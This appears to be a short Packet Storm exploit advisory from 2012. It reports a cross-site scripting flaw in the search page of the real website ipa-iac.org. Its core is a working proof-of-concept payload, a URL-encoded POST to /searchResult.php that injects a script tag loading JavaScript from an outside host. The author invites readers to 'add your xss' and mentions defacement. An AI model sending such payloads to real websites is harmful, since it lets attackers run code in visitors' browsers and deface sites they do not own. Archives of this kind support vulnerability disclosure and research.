IPA-IAC.org Cross Site Scripting

2012-04-27T00:00:00
ID PACKETSTORM:112314
Type packetstorm
Reporter Atmon3r
Modified 2012-04-27T00:00:00

Description

                                        
                                            `+-------------------------------------------------------------------------+  
# Exploit Title : ipa-iac.org - website XSS (Cross Site Scripting) and   
deface passive  
# Author : Atmon3r  
# Date : 26/04/2012  
# Xss type : $_POST  
+-------------------------------------------------------------------------+  
  
[+] POC:  
POST /searchResult.php   
srch_input=%2F%22%3E%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fyourjavascript.com%2F27544112151%2Fxss.atmon3r.js%22%3E%3C%2Fscript%3E  
  
[+] DEMO:  
Just add your xss in input search :D  
  
--   
Website: http://atmoner.com  
`